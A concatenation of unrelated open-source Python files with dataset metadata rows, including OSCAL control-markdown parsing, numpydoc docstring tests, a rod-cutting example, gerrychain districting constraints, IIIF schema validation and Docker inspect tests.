props.append(
common.Property(ns=const.NAMESPACE_FEDRAMP, name=const.PLANNED, value=status[const.PLANNED])
)
datestr = status[const.COMPLETION_DATE]
if isinstance(datestr, datetime):
datestr = datestr.strftime('%Y-%m-%d')
else:
datestr = str(datestr)
props.append(
common.Property(ns=const.NAMESPACE_FEDRAMP, name=const.PLANNED_COMPLETION_DATE, value=datestr)
)
else:
if len(status) != 1:
raise TrestleError(f'Unexpected content in control {control_id} yaml header: {status}')
value = list(status.keys())[0]
remark = list(status.values())[0]
props.append(
common.Property(
ns=const.NAMESPACE_FEDRAMP,
name=const.IMPLEMENTATION_STATUS,
value=value,
remarks=common.Remarks(__root__=remark)
)
)
else:
raise TrestleError(f'Unexpected content in control {control_id} yaml header: {status}')
for role in roles:
if isinstance(role, str):
# role_id must conform to NCNAME regex
role = role.strip().replace(' ', '_')
if role:
responsible_roles.append(common.ResponsibleRole(role_id=role))
else:
logger.warning(f'Role in header for control {control_id} not recognized: {role}')
if props:
imp_req.props = as_list(imp_req.props)
imp_req.props.extend(props)
if responsible_roles:
imp_req.responsible_roles = as_list(imp_req.responsible_roles)
imp_req.responsible_roles.extend(responsible_roles)
imp_req.responsible_roles = none_if_empty(imp_req.responsible_roles)
# enforce single list of resp. roles for control and each by_comp
for by_comp in as_list(imp_req.by_components):
by_comp.responsible_roles = imp_req.responsible_roles
@staticmethod
def read_implemented_requirement(
control_file: pathlib.Path, avail_comps: Dict[str, ossp.SystemComponent]
) -> ossp.ImplementedRequirement:
"""
Get the implementated requirement associated with given control and link to existing components or new ones.
Args:
control_file: path of the control markdown file
avail_comps: dictionary of known components keyed by component name
Returns:
The one implemented requirement for this control.
Notes:
Each statement may have several responses, with each response in a by_component for a specific component.
statement_map keeps track of statements that may have several by_component responses.
"""
control_id = control_file.stem
comp_dict, header = ControlIOReader.read_all_implementation_prose_and_header(control_file)
statement_map: Dict[str, ossp.Statement] = {}
# create a new implemented requirement linked to the control id to hold the statements
imp_req: ossp.ImplementedRequirement = gens.generate_sample_model(ossp.ImplementedRequirement)
imp_req.control_id = control_id
# the comp_dict captures all component names referenced by the control
for comp_name in comp_dict.keys():
if comp_name in avail_comps:
component = avail_comps[comp_name]
else:
# here is where we create a new component on the fly as needed
component = gens.generate_sample_model(ossp.SystemComponent)
component.title = comp_name
avail_comps[comp_name] = component
for label, prose_lines in comp_dict[comp_name].items():
# create a statement to hold the by-components and assign the statement id
if label == 'Statement':
statement_id = f'{control_id}_smt'
else:
clean_label = label.strip('.')
statement_id = ControlIOReader._strip_to_make_ncname(f'{control_id}_smt.{clean_label}')
if statement_id in statement_map:
statement = statement_map[statement_id]
else:
statement: ossp.Statement = gens.generate_sample_model(ossp.Statement)
statement.statement_id = statement_id
statement.by_components = []
statement_map[statement_id] = statement
# create a new by-component to add to this statement
by_comp: ossp.ByComponent = gens.generate_sample_model(ossp.ByComponent)
# link it to the component uuid
by_comp.component_uuid = component.uuid
# add the response prose to the description
by_comp.description = '\n'.join(prose_lines)
statement.by_components.append(by_comp)
imp_req.statements = list(statement_map.values())
ControlIOReader._insert_header_content(imp_req, header, control_id)
return imp_req
@staticmethod
def _read_added_part(ii: int, lines: List[str], control_id: str) -> Tuple[int, Optional[common.Part]]:
"""Read a single part indicated by ## Control foo."""
while 0 <= ii < len(lines):
# look for ## Control foo - then read prose
line = lines[ii]
prefix = '## Control '
if line:
if not line.startswith(prefix):
raise TrestleError(f'Unexpected line in Editable Content for control {control_id}: {line}')
part_name_raw = line[len(prefix):]
part_name = spaces_and_caps_to_snake(part_name_raw)
prose_lines = []
ii += 1
have_content = False
while 0 <= ii < len(lines):
line = lines[ii]
if not line.startswith(prefix):
if line:
have_content = True
prose_lines.append(line)
ii += 1
continue
break
if have_content:
prose = '\n'.join(prose_lines)
# strip leading / trailing new lines.
prose = prose.strip('\n')
id_ = f'{control_id}_{part_name}'
part = common.Part(id=id_, name=part_name, prose=prose)
return ii, part
ii += 1
return -1, None
@staticmethod
def read_new_alters_and_params(control_path: pathlib.Path) -> Tuple[List[prof.Alter], Dict[str, str]]:
"""Get parts for the markdown control corresponding to Editable Content - if any."""
control_id = control_path.stem
new_alters: List[prof.Alter] = []
param_dict: Dict[str, str] = {}
lines, header = ControlIOReader._load_control_lines_and_header(control_path)
ii = 0
while 0 <= ii < len(lines):
line = lines[ii]
if line.startswith('# Editable Content'):
ii += 1
while 0 <= ii < len(lines):
ii, part = ControlIOReader._read_added_part(ii, lines, control_id)
if ii < 0:
break
alter = prof.Alter(
control_id=control_id,
adds=[prof.Add(parts=[part], position='after', by_id=f'{control_id}_smt')]
)
new_alters.append(alter)
else:
ii += 1
header_params = header.get(const.SET_PARAMS_TAG, {})
if header_params:
param_dict.update(header_params)
return new_alters, param_dict
@staticmethod
def get_control_param_dict(control: cat.Control, values_only: bool) -> Dict[str, str]:
"""Get a dict of the parameters in a control and their values."""
param_dict: Dict[str, str] = {}
params: List[common.Parameter] = as_list(control.params)
for param in params:
value_str = 'No value found'
if param.label:
value_str = param.label
if param.values:
values = [val.__root__ for val in param.values]
if len(values) == 1:
value_str = values[0]
else:
value_str = f"[{', '.join(value for value in values)}]"
# if there isn't an actual value then ignore this param
elif values_only:
continue
param_dict[param.id] = value_str
return param_dict
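    # Usage sketch (assumes `control` comes from a loaded catalog; ids and values are
    # hypothetical):
    #   param_dict = ControlIOReader.get_control_param_dict(control, values_only=False)
    #   # e.g. {'ac-1_prm_1': 'organization-defined personnel or roles'}
    # With values_only=True, parameters that only have a label and no value are skipped.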
@staticmethod
def read_control(control_path: pathlib.Path) -> cat.Control:
"""Read the control markdown file."""
control = gens.generate_sample_model(cat.Control)
md_api = MarkdownAPI()
_, control_tree = md_api.processor.process_markdown(control_path)
control_titles = list(control_tree.get_all_headers_for_level(1))
if len(control_titles) == 0:
raise TrestleError(f'Control markdown: {control_path} contains no control title.')
control.id, _, control.title = ControlIOReader._read_id_group_id_title(control_titles[0])
control_headers = list(control_tree.get_all_headers_for_level(2))
if len(control_headers) == 0:
raise TrestleError(f'Control markdown: {control_path} contains no control statements.')
control_statement = control_tree.get_node_for_key(control_headers[0])
rc, statement_part = ControlIOReader._read_control_statement(
0, control_statement.content.raw_text.split('\n'), control.id
)
if rc < 0:
return control
control.parts = [statement_part] if statement_part else None
control_objective = control_tree.get_node_for_key('## Control Objective')
if control_objective is not None:
_, objective_part = ControlIOReader._read_control_objective(
0, control_objective.content.raw_text.split('\n'), control.id
)
if objective_part:
if control.parts:
control.parts.append(objective_part)
else:
control.parts = [objective_part]
for header_key in control_tree.get_all_headers_for_key('## Control', False):
if header_key not in {control_headers[0], '## Control Objective', control_titles[0]}:
section_node = control_tree.get_node_for_key(header_key)
_, control.parts = ControlIOReader._read_sections(
0, section_node.content.raw_text.split('\n'), control.id, control.parts
)
return control
| 46.145189 | 164 | 0.587828 |
4a1f6444e2b8537d0e12f4b812b194e85c7c4869 | 127 | py | Python | FaceDetectionModule/helper_types/vector.py | Bricktheworld/rhombus-api-examples-python | b4778c3a635786070ee10a3131b1a1f7f6ebac36 | ["MIT"] | null | null | null | FaceDetectionModule/helper_types/vector.py | Bricktheworld/rhombus-api-examples-python | b4778c3a635786070ee10a3131b1a1f7f6ebac36 | ["MIT"] | 20 | 2021-06-08T22:29:20.000Z | 2022-01-15T19:51:46.000Z | FaceDetectionModule/helper_types/vector.py | Bricktheworld/rhombus-api-examples-python | b4778c3a635786070ee10a3131b1a1f7f6ebac36 | ["MIT"] | 9 | 2021-06-08T22:15:35.000Z | 2022-03-03T05:19:58.000Z |
class Vec2:
x: float
y: float
def __init__(self, x:float, y:float) -> None:
self.x = x
self.y = y
| 15.875 | 49 | 0.503937 |
4a1f64cf521fe09b168f544cdd194dd0b5234608 | 13,129 | py | Python | doc/sphinxext/tests/test_docscrape.py | willgrass/pandas | 137fe223d1cf0663c924344473033b84750888bb | ["BSD-3-Clause"] | 2 | 2020-07-03T12:00:29.000Z | 2021-04-18T06:54:30.000Z | doc/sphinxext/tests/test_docscrape.py | willgrass/pandas | 137fe223d1cf0663c924344473033b84750888bb | ["BSD-3-Clause"] | null | null | null | doc/sphinxext/tests/test_docscrape.py | willgrass/pandas | 137fe223d1cf0663c924344473033b84750888bb | ["BSD-3-Clause"] | null | null | null |
# -*- encoding:utf-8 -*-
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from docscrape import NumpyDocString, FunctionDoc
from docscrape_sphinx import SphinxDocString
from nose.tools import *
doc_txt = '''\
numpy.multivariate_normal(mean, cov, shape=None)
Draw values from a multivariate normal distribution with specified
mean and covariance.
The multivariate normal or Gaussian distribution is a generalisation
of the one-dimensional normal distribution to higher dimensions.
Parameters
----------
mean : (N,) ndarray
Mean of the N-dimensional distribution.
.. math::
(1+2+3)/3
cov : (N,N) ndarray
Covariance matrix of the distribution.
shape : tuple of ints
Given a shape of, for example, (m,n,k), m*n*k samples are
generated, and packed in an m-by-n-by-k arrangement. Because
each sample is N-dimensional, the output shape is (m,n,k,N).
Returns
-------
out : ndarray
The drawn samples, arranged according to `shape`. If the
shape given is (m,n,...), then the shape of `out` is is
(m,n,...,N).
In other words, each entry ``out[i,j,...,:]`` is an N-dimensional
value drawn from the distribution.
Warnings
--------
Certain warnings apply.
Notes
-----
Instead of specifying the full covariance matrix, popular
approximations include:
- Spherical covariance (`cov` is a multiple of the identity matrix)
- Diagonal covariance (`cov` has non-negative elements only on the diagonal)
This geometrical property can be seen in two dimensions by plotting
generated data-points:
>>> mean = [0,0]
>>> cov = [[1,0],[0,100]] # diagonal covariance, points lie on x or y-axis
>>> x,y = multivariate_normal(mean,cov,5000).T
>>> plt.plot(x,y,'x'); plt.axis('equal'); plt.show()
Note that the covariance matrix must be symmetric and non-negative
definite.
References
----------
.. [1] A. Papoulis, "Probability, Random Variables, and Stochastic
Processes," 3rd ed., McGraw-Hill Companies, 1991
.. [2] R.O. Duda, P.E. Hart, and D.G. Stork, "Pattern Classification,"
2nd ed., Wiley, 2001.
See Also
--------
some, other, funcs
otherfunc : relationship
Examples
--------
>>> mean = (1,2)
>>> cov = [[1,0],[1,0]]
>>> x = multivariate_normal(mean,cov,(3,3))
>>> print x.shape
(3, 3, 2)
The following is probably true, given that 0.6 is roughly twice the
standard deviation:
>>> print list( (x[0,0,:] - mean) < 0.6 )
[True, True]
.. index:: random
:refguide: random;distributions, random;gauss
'''
doc = NumpyDocString(doc_txt)
def test_signature():
assert doc['Signature'].startswith('numpy.multivariate_normal(')
assert doc['Signature'].endswith('shape=None)')
def test_summary():
assert doc['Summary'][0].startswith('Draw values')
assert doc['Summary'][-1].endswith('covariance.')
def test_extended_summary():
assert doc['Extended Summary'][0].startswith('The multivariate normal')
def test_parameters():
assert_equal(len(doc['Parameters']), 3)
assert_equal([n for n,_,_ in doc['Parameters']], ['mean','cov','shape'])
arg, arg_type, desc = doc['Parameters'][1]
assert_equal(arg_type, '(N,N) ndarray')
assert desc[0].startswith('Covariance matrix')
assert doc['Parameters'][0][-1][-2] == ' (1+2+3)/3'
def test_returns():
assert_equal(len(doc['Returns']), 1)
arg, arg_type, desc = doc['Returns'][0]
assert_equal(arg, 'out')
assert_equal(arg_type, 'ndarray')
assert desc[0].startswith('The drawn samples')
assert desc[-1].endswith('distribution.')
def test_notes():
assert doc['Notes'][0].startswith('Instead')
assert doc['Notes'][-1].endswith('definite.')
assert_equal(len(doc['Notes']), 17)
def test_references():
assert doc['References'][0].startswith('..')
assert doc['References'][-1].endswith('2001.')
def test_examples():
assert doc['Examples'][0].startswith('>>>')
assert doc['Examples'][-1].endswith('True]')
def test_index():
assert_equal(doc['index']['default'], 'random')
print doc['index']
assert_equal(len(doc['index']), 2)
assert_equal(len(doc['index']['refguide']), 2)
def non_blank_line_by_line_compare(a,b):
a = [l for l in a.split('\n') if l.strip()]
b = [l for l in b.split('\n') if l.strip()]
for n,line in enumerate(a):
if not line == b[n]:
raise AssertionError("Lines %s of a and b differ: "
"\n>>> %s\n<<< %s\n" %
(n,line,b[n]))
def test_str():
non_blank_line_by_line_compare(str(doc),
"""numpy.multivariate_normal(mean, cov, shape=None)
Draw values from a multivariate normal distribution with specified
mean and covariance.
The multivariate normal or Gaussian distribution is a generalisation
of the one-dimensional normal distribution to higher dimensions.
Parameters
----------
mean : (N,) ndarray
Mean of the N-dimensional distribution.
.. math::
(1+2+3)/3
cov : (N,N) ndarray
Covariance matrix of the distribution.
shape : tuple of ints
Given a shape of, for example, (m,n,k), m*n*k samples are
generated, and packed in an m-by-n-by-k arrangement. Because
each sample is N-dimensional, the output shape is (m,n,k,N).
Returns
-------
out : ndarray
The drawn samples, arranged according to `shape`. If the
shape given is (m,n,...), then the shape of `out` is is
(m,n,...,N).
In other words, each entry ``out[i,j,...,:]`` is an N-dimensional
value drawn from the distribution.
Warnings
--------
Certain warnings apply.
See Also
--------
`some`_, `other`_, `funcs`_
`otherfunc`_
relationship
Notes
-----
Instead of specifying the full covariance matrix, popular
approximations include:
- Spherical covariance (`cov` is a multiple of the identity matrix)
- Diagonal covariance (`cov` has non-negative elements only on the diagonal)
This geometrical property can be seen in two dimensions by plotting
generated data-points:
>>> mean = [0,0]
>>> cov = [[1,0],[0,100]] # diagonal covariance, points lie on x or y-axis
>>> x,y = multivariate_normal(mean,cov,5000).T
>>> plt.plot(x,y,'x'); plt.axis('equal'); plt.show()
Note that the covariance matrix must be symmetric and non-negative
definite.
References
----------
.. [1] A. Papoulis, "Probability, Random Variables, and Stochastic
Processes," 3rd ed., McGraw-Hill Companies, 1991
.. [2] R.O. Duda, P.E. Hart, and D.G. Stork, "Pattern Classification,"
2nd ed., Wiley, 2001.
Examples
--------
>>> mean = (1,2)
>>> cov = [[1,0],[1,0]]
>>> x = multivariate_normal(mean,cov,(3,3))
>>> print x.shape
(3, 3, 2)
The following is probably true, given that 0.6 is roughly twice the
standard deviation:
>>> print list( (x[0,0,:] - mean) < 0.6 )
[True, True]
.. index:: random
:refguide: random;distributions, random;gauss""")
def test_sphinx_str():
sphinx_doc = SphinxDocString(doc_txt)
non_blank_line_by_line_compare(str(sphinx_doc),
"""
.. index:: random
single: random;distributions, random;gauss
Draw values from a multivariate normal distribution with specified
mean and covariance.
The multivariate normal or Gaussian distribution is a generalisation
of the one-dimensional normal distribution to higher dimensions.
:Parameters:
**mean** : (N,) ndarray
Mean of the N-dimensional distribution.
.. math::
(1+2+3)/3
**cov** : (N,N) ndarray
Covariance matrix of the distribution.
**shape** : tuple of ints
Given a shape of, for example, (m,n,k), m*n*k samples are
generated, and packed in an m-by-n-by-k arrangement. Because
each sample is N-dimensional, the output shape is (m,n,k,N).
:Returns:
**out** : ndarray
The drawn samples, arranged according to `shape`. If the
shape given is (m,n,...), then the shape of `out` is is
(m,n,...,N).
In other words, each entry ``out[i,j,...,:]`` is an N-dimensional
value drawn from the distribution.
.. warning::
Certain warnings apply.
.. seealso::
:obj:`some`, :obj:`other`, :obj:`funcs`
:obj:`otherfunc`
relationship
.. rubric:: Notes
Instead of specifying the full covariance matrix, popular
approximations include:
- Spherical covariance (`cov` is a multiple of the identity matrix)
- Diagonal covariance (`cov` has non-negative elements only on the diagonal)
This geometrical property can be seen in two dimensions by plotting
generated data-points:
>>> mean = [0,0]
>>> cov = [[1,0],[0,100]] # diagonal covariance, points lie on x or y-axis
>>> x,y = multivariate_normal(mean,cov,5000).T
>>> plt.plot(x,y,'x'); plt.axis('equal'); plt.show()
Note that the covariance matrix must be symmetric and non-negative
definite.
.. rubric:: References
.. [1] A. Papoulis, "Probability, Random Variables, and Stochastic
Processes," 3rd ed., McGraw-Hill Companies, 1991
.. [2] R.O. Duda, P.E. Hart, and D.G. Stork, "Pattern Classification,"
2nd ed., Wiley, 2001.
.. rubric:: Examples
>>> mean = (1,2)
>>> cov = [[1,0],[1,0]]
>>> x = multivariate_normal(mean,cov,(3,3))
>>> print x.shape
(3, 3, 2)
The following is probably true, given that 0.6 is roughly twice the
standard deviation:
>>> print list( (x[0,0,:] - mean) < 0.6 )
[True, True]
""")
doc2 = NumpyDocString("""
Returns array of indices of the maximum values of along the given axis.
Parameters
----------
a : {array_like}
Array to look in.
axis : {None, integer}
If None, the index is into the flattened array, otherwise along
the specified axis""")
def test_parameters_without_extended_description():
assert_equal(len(doc2['Parameters']), 2)
doc3 = NumpyDocString("""
my_signature(*params, **kwds)
Return this and that.
""")
def test_escape_stars():
signature = str(doc3).split('\n')[0]
assert_equal(signature, 'my_signature(\*params, \*\*kwds)')
doc4 = NumpyDocString(
"""a.conj()
Return an array with all complex-valued elements conjugated.""")
def test_empty_extended_summary():
assert_equal(doc4['Extended Summary'], [])
doc5 = NumpyDocString(
"""
a.something()
Raises
------
LinAlgException
If array is singular.
""")
def test_raises():
assert_equal(len(doc5['Raises']), 1)
name,_,desc = doc5['Raises'][0]
assert_equal(name,'LinAlgException')
assert_equal(desc,['If array is singular.'])
def test_see_also():
doc6 = NumpyDocString(
"""
z(x,theta)
See Also
--------
func_a, func_b, func_c
func_d : some equivalent func
foo.func_e : some other func over
multiple lines
func_f, func_g, :meth:`func_h`, func_j,
func_k
:obj:`baz.obj_q`
:class:`class_j`: fubar
foobar
""")
assert len(doc6['See Also']) == 12
for func, desc, role in doc6['See Also']:
if func in ('func_a', 'func_b', 'func_c', 'func_f',
'func_g', 'func_h', 'func_j', 'func_k', 'baz.obj_q'):
assert(not desc)
else:
assert(desc)
if func == 'func_h':
assert role == 'meth'
elif func == 'baz.obj_q':
assert role == 'obj'
elif func == 'class_j':
assert role == 'class'
else:
assert role is None
if func == 'func_d':
assert desc == ['some equivalent func']
elif func == 'foo.func_e':
assert desc == ['some other func over', 'multiple lines']
elif func == 'class_j':
assert desc == ['fubar', 'foobar']
def test_see_also_print():
class Dummy(object):
"""
See Also
--------
func_a, func_b
func_c : some relationship
goes here
func_d
"""
pass
obj = Dummy()
s = str(FunctionDoc(obj, role='func'))
assert(':func:`func_a`, :func:`func_b`' in s)
assert(' some relationship' in s)
assert(':func:`func_d`' in s)
doc7 = NumpyDocString("""
Doc starts on second line.
""")
def test_empty_first_line():
assert doc7['Summary'][0].startswith('Doc starts')
def test_no_summary():
str(SphinxDocString("""
Parameters
----------"""))
def test_unicode():
doc = SphinxDocString("""
öäöäöäöäöåååå
öäöäöäööäååå
Parameters
----------
ååå : äää
ööö
Returns
-------
ååå : ööö
äää
""")
assert doc['Summary'][0] == u'öäöäöäöäöåååå'.encode('utf-8')
def test_plot_examples():
doc = SphinxDocString("""
Examples
--------
>>> import matplotlib.pyplot as plt
>>> plt.plot([1,2,3],[4,5,6])
>>> plt.show()
""")
assert 'plot::' in str(doc), str(doc)
doc = SphinxDocString("""
Examples
--------
.. plot::
import matplotlib.pyplot as plt
plt.plot([1,2,3],[4,5,6])
plt.show()
""")
assert str(doc).count('plot::') == 1, str(doc)
| 25.642578 | 80 | 0.619697 |
4a1f65c128c3aa0027e7a9e1938d90e083280c8f | 1,199 | py | Python | CLRS/Chapter 15/Dynamic Programming/15.2/cut_rod.py | pablotrinidad/competitive-programming | de16d007ca276330cd0a92bd5b75ce4e9e75fb59 | [
"MIT"
] | null | null | null | CLRS/Chapter 15/Dynamic Programming/15.2/cut_rod.py | pablotrinidad/competitive-programming | de16d007ca276330cd0a92bd5b75ce4e9e75fb59 | [
"MIT"
] | null | null | null | CLRS/Chapter 15/Dynamic Programming/15.2/cut_rod.py | pablotrinidad/competitive-programming | de16d007ca276330cd0a92bd5b75ce4e9e75fb59 | [
"MIT"
] | null | null | null | """Rod cutting.
Recursive top-down implementation.
"""
import cProfile
from random import randint
def cut_rod(p, n):
"""Cut rod.
    Implements the computation in equation 15.2 (r_n = max_{1 <= i <= n}(p_i + r_{n-i})).
Where p is the array of prices by length and n the length of the rod.
"""
if n == 0:
return 0
q = 0
for i in range(n):
q = max(q, p[i] + cut_rod(p, n - (i + 1)))
return q
def cut_rod2(p, n, r=None):
"""Cut rod.
Same functionality as the original but implemented
as a top-down with memoization.
"""
    if r is None:
        r = {}
    if n in r:
        return r[n]
else:
if n == 0:
return 0
else:
q = 0
for i in range(n):
q = max(q, p[i] + cut_rod2(p, n - (i + 1), r))
r[n] = q
return q
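# Illustrative addition (not part of the original script): a bottom-up version of
# the same recurrence r_n = max_{1 <= i <= n}(p_i + r_{n-i}), filling a table of
# optimal revenues for lengths 0..n instead of recursing.
def cut_rod_bottom_up(p, n):
    """Cut rod iteratively; p is the price list and n the rod length."""
    r = [0] * (n + 1)
    for j in range(1, n + 1):
        q = 0
        for i in range(j):
            q = max(q, p[i] + r[j - (i + 1)])
        r[j] = q
    return r[n]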
def test_algorithms(n):
"""Test algorithms with n-sized problems."""
p = [randint(1, 50) for _ in range(n)]
for i in range(1, n+1):
print('\n\n', '=' * 20, 'N:', i, '=' * 20)
cProfile.runctx('cut_rod2(p, i)', globals(), locals())
cProfile.runctx('cut_rod(p, i)', globals(), locals())
test_algorithms(25)
| 22.203704 | 93 | 0.51543 |
4a1f663e88483911aa4b30fead0272e8dce84bc7 | 4,943 | py | Python | gerrychain/constraints/validity.py | rwbogl/GerryChain | e7254ea62df5dc2c6eb6c60d0437d7152bb9649a | [
"BSD-3-Clause"
] | null | null | null | gerrychain/constraints/validity.py | rwbogl/GerryChain | e7254ea62df5dc2c6eb6c60d0437d7152bb9649a | [
"BSD-3-Clause"
] | null | null | null | gerrychain/constraints/validity.py | rwbogl/GerryChain | e7254ea62df5dc2c6eb6c60d0437d7152bb9649a | [
"BSD-3-Clause"
] | null | null | null | from ..updaters import CountySplit
from .bounds import Bounds
class Validator:
"""A single callable for checking that a partition passes a collection of
constraints. Intended to be passed as the ``is_valid`` parameter when
instantiating :class:`~gerrychain.MarkovChain`.
This class is meant to be called as a function after instantiation; its
return is ``True`` if all validators pass, and ``False`` if any one fails.
Example usage::
is_valid = Validator([constraint1, constraint2, constraint3])
chain = MarkovChain(proposal, is_valid, accept, initial_state, total_steps)
"""
def __init__(self, constraints):
"""
:param constraints: List of validator functions that will check partitions.
"""
self.constraints = constraints
def __call__(self, partition):
"""Determine if the given partition is valid.
:param partition: :class:`Partition` class to check.
"""
# check each constraint function and fail when a constraint test fails
for constraint in self.constraints:
is_valid = constraint(partition)
if is_valid is False:
return False
elif is_valid is True:
pass
else:
raise TypeError(
"Constraint {} returned a non-boolean.".format(repr(constraint))
)
# all constraints are satisfied
return True
def within_percent_of_ideal_population(
initial_partition, percent=0.01, pop_key="population"
):
"""Require that all districts are within a certain percent of "ideal" (i.e.,
uniform) population.
Ideal population is defined as "total population / number of districts."
:param initial_partition: Starting partition from which to compute district information.
:param percent: (optional) Allowed percentage deviation. Default is 1%.
:param pop_key: (optional) The name of the population
:class:`Tally <gerrychain.updaters.Tally>`. Default is ``"population"``.
:return: A :class:`.Bounds` constraint on the population attribute identified
by ``pop_key``.
"""
def population(partition):
return partition[pop_key].values()
number_of_districts = len(initial_partition[pop_key].keys())
total_population = sum(initial_partition[pop_key].values())
ideal_population = total_population / number_of_districts
bounds = ((1 - percent) * ideal_population, (1 + percent) * ideal_population)
return Bounds(population, bounds=bounds)
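# Worked example (illustrative numbers only): for an initial partition whose total
# population of 300,000 is spread over 3 districts, the ideal population is 100,000,
# so the default percent=0.01 yields bounds of (99,000, 101,000) on every district's
# population tally.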
def deviation_from_ideal(partition, attribute="population"):
"""Computes the deviation of the given ``attribute`` from exact equality
among parts of the partition. Usually ``attribute`` is the population, and
this function is used to compute how far a districting plan is from exact population
equality.
By "deviation" we mean ``(actual_value - ideal)/ideal`` (not the absolute value).
:param partition: A partition.
:param attribute: (optional) The :class:`Tally <gerrychain.updaters.Tally>` to
compute deviation for. Default is ``"population"``.
:return: dictionary from parts to their deviation
"""
number_of_districts = len(partition[attribute].keys())
total = sum(partition[attribute].values())
ideal = total / number_of_districts
return {
part: (value - ideal) / ideal for part, value in partition[attribute].items()
}
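# Illustrative sketch (not part of gerrychain): a plain dict standing in for a
# partition, to show the arithmetic of deviation_from_ideal. With populations
# {"A": 110, "B": 90, "C": 100} the ideal is 300 / 3 = 100, giving deviations
# {"A": 0.1, "B": -0.1, "C": 0.0}.
def _deviation_from_ideal_example():
    """Return deviations for a hypothetical three-district population tally."""
    fake_partition = {"population": {"A": 110, "B": 90, "C": 100}}
    return deviation_from_ideal(fake_partition, attribute="population")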
def districts_within_tolerance(partition, attribute_name="population", percentage=0.1):
"""Check if all districts are within a certain percentage of the "smallest"
district, as defined by the given attribute.
:param partition: partition class instance
:param attrName: string that is the name of an updater in partition
:param percentage: what percent difference is allowed
:return: whether the districts are within specified tolerance
:rtype: bool
"""
if percentage >= 1:
percentage *= 0.01
values = partition[attribute_name].values()
max_difference = max(values) - min(values)
within_tolerance = max_difference <= percentage * min(values)
return within_tolerance
def refuse_new_splits(partition_county_field):
"""Refuse all proposals that split a county that was previous unsplit.
:param partition_county_field: Name of field for county information generated by
:func:`.county_splits`.
"""
def _refuse_new_splits(partition):
for county_info in partition[partition_county_field].values():
if county_info.split == CountySplit.NEW_SPLIT:
return False
return True
return _refuse_new_splits
def no_vanishing_districts(partition):
"""Require that no districts be completely consumed."""
if not partition.parent:
return True
return all(len(part) > 0 for part in partition.assignment.parts.values())
| 35.818841 | 92 | 0.688448 |
4a1f6680436c6800c973e4e6ef0624168968d7bf | 2,518 | py | Python | schema-test.py | azaroth42/iiif-v3-validator | 7a8e763bf7f2c033e647948c66757de148511160 | [
"Apache-2.0"
] | 2 | 2018-06-21T15:30:57.000Z | 2018-12-20T16:01:50.000Z | schema-test.py | azaroth42/iiif-v3-validator | 7a8e763bf7f2c033e647948c66757de148511160 | [
"Apache-2.0"
] | 1 | 2018-12-07T14:00:17.000Z | 2018-12-07T14:00:17.000Z | schema-test.py | azaroth42/iiif-v3-validator | 7a8e763bf7f2c033e647948c66757de148511160 | [
"Apache-2.0"
] | null | null | null |
import json
import jsonschema
import os
from jsonschema import validate, Draft6Validator
from jsonschema.exceptions import ValidationError
import json
from iiif_prezi_upgrader import Upgrader
fh = file('schema/Manifest.json')
schema = json.load(fh)
fh.close()
v = Draft6Validator(schema)
fh = file('data/spec-example.json')
instance = json.load(fh)
fh.close()
v.validate(instance)
# walk over all our downloaded stuff...
files = os.listdir('data/remote_cache')
flags= {"ext_ok": False, "deref_links": False}
for f in files:
if f.endswith('.json'):
fn = os.path.join('data/remote_cache', f)
print "processing file: %s" % fn
upgrader = Upgrader(flags)
try:
data = upgrader.process_cached(fn)
except Exception as e:
print("Failed to upgrade %s" % fn)
break
try:
v.validate(data)
except ValidationError as e:
print("Failed to validate %s" % fn)
if e.absolute_schema_path[-1] == u'required' and \
e.message.startswith("u'type'"):
continue
print(e.message)
print(e.absolute_schema_path)
print(e.absolute_path)
break
print "validated!"
if 0:
fh = file('tests/_top.json')
data = fh.read()
fh.close()
start = json.loads(data)
startResolver = FileResolver("", start)
classes = {}
for x in clss:
ss = os.listdir('tests/%s' % x)
l = ["%s/%s" % (x, y) for y in ss if y.endswith('.json')]
schema = {}
for fn in l:
sch = file("tests/%s" % fn)
data = sch.read()
sch.close()
try:
sjs = json.loads(data)
except:
print "Invalid json in schem: %s :(" % fn
raise
fresolvr = FileResolver("", sjs)
schema[fn] = Draft4Validator(sjs, resolver=fresolvr)
classes[x] = schema
def resolve(ref):
c = os.path.split(ref)[0]
return classes[c][ref]
def process(instance, validator):
print validator.schema['title']
try:
validator.validate(instance)
except ValidationError:
print v.schema['errorMessage']
for s in validator.schema.get('onFail', []):
v = resolve(s['$ref'])
process(instance, v)
except Exception:
raise
else:
print "okay"
for s in validator.schema.get('onSuccess', []):
v = resolve(s['$ref'])
process(instance, v)
for s in validator.schema.get('onResult', []):
v = resolve(s['$ref'])
process(instance, v)
ils = os.listdir('data/')
for ifn in ils:
print "Annotation File: %s" % ifn
ifh = file("data/examples/%s" % ifn)
data = ifh.read()
ifh.close()
ijs = json.loads(data)
v = resolve(start['onResult'][0]['$ref'])
process(ijs, v)
| 20.639344 | 59 | 0.650913 |
4a1f679455c0bb1778d5821d9e0f93bd58a15af6 | 1,803 | py | Python | tests/tests/test_docker_inspect.py | housewares/agent | ba54bf145038e7fec723a44299e85869b8600ce1 | [
"Apache-2.0"
] | null | null | null | tests/tests/test_docker_inspect.py | housewares/agent | ba54bf145038e7fec723a44299e85869b8600ce1 | [
"Apache-2.0"
] | null | null | null | tests/tests/test_docker_inspect.py | housewares/agent | ba54bf145038e7fec723a44299e85869b8600ce1 | [
"Apache-2.0"
] | 2 | 2021-01-10T13:27:22.000Z | 2021-01-11T14:19:50.000Z | from common import delete_container, docker_client, event_test
def test_inspect_by_name(agent):
delete_container('/inspect_test')
client = docker_client()
c = client.create_container('ibuildthecloud/helloworld',
name='inspect_test')
inspect = docker_client().inspect_container(c['Id'])
def post(req, resp):
response_inspect = resp['data']['instanceInspect']
# diff_dict(inspect, response_inspect)
assert response_inspect['Id'] == inspect['Id']
del resp['links']
del resp['actions']
event_test(agent, 'docker/instance_inspect',
post_func=post, diff=False)
def test_inspect_by_id(agent):
delete_container('/inspect_test')
client = docker_client()
c = client.create_container('ibuildthecloud/helloworld',
name='inspect_test')
inspect = docker_client().inspect_container(c['Id'])
def pre(req):
instance_inspect = req['data']['instanceInspect']
instance_inspect['id'] = c['Id']
del instance_inspect['name']
def post(req, resp, valid_resp):
response_inspect = resp['data']['instanceInspect']
# can't compare the inspect from go api and py api
# TODO find a new way to assert
assert response_inspect['Id'] == inspect['Id']
# diff_dict(inspect, response_inspect)
event_test(agent, 'docker/instance_inspect', pre_func=pre,
post_func=post, diff=False)
def test_inspect_not_found(agent):
delete_container('/inspect_test')
def post(req, resp):
assert "Id" not in resp['data']['instanceInspect']
assert "Name" not in resp['data']['instanceInspect']
